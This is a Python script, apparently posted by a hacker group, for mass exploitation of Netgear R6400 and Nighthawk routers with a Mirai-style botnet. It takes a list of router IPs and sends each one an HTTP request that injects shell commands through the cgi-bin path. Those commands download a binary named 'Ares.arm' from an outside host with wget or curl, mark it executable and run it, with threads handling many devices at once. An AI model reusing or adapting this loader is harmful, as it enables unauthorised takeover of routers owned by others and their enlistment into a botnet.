[MULTI NETGEAR R6400 > EXPLOIT LOADER] [RCE] [MIRAI]

1. #!/usr/bin/env python
2. # -*- coding: utf-8 -*-
3. # NETGEAR R6400 > Exploit made by B4CKDOOR #
4. # B4CKDOORARCHIVE.HOST - https://discord.gg/MVktpTW #
5. # NG EXPLOITABLE DEVICES R6400 , R7000 Nighthawk , R7500 Nighthawk , R7800 NighthawK, R8000 Nighthawk, R8500 Nighthawk,R9000 Nighthawk #
6.  
7. import threading, random, socket, time, sys, requests, re, os
8. from threading import Thread
9. from time import sleep
10. import requests
11. from requests.auth import HTTPDigestAuth
12. from decimal import *
13.  
14. if len(sys.argv) < 3:
15.     print "\033[37mUsage: python "+sys.argv[0]+" <list> <port>\033[37m"
16.     sys.exit()
17.  
18. ip = "1.3.3.7" # BINS LOCATION IP
19. vulns = open(sys.argv[1], "r").readlines()
20. port = int(sys.argv[2]) # PORTS 80 8443 8081
21. class send_payload(threading.Thread):
22.     def __init__ (self, ip):
23.         threading.Thread.__init__(self)
24.         self.ip = str(ip).rstrip('\n')
25.     def run(self):
26.         try:
27.             url = "http://" + self.ip + ":"+port+"/cgi-bin/;cd /opt; wget http://" + ip + "/Ares.arm; curl -O http://" + ip + "/Ares.arm; chmod +x Ares.arm; ./Ares.arm" #ARCH: ARM , MIPS
28.             requests.get(url, timeout=3)
29.             print "[R6400] Loading: %s"%(self.ip)
30.         except:
31.             pass
32.  
33. for IP in vulns:
34.     try:
35.         ip = "".join(IP)
36.         ip = ip.replace("\n", "")
37.         t = send_payload(ip)
38.         t.start()
39.         time.sleep(0.03)
40.     except:
41.         pass #CODED BY B4CKDOOR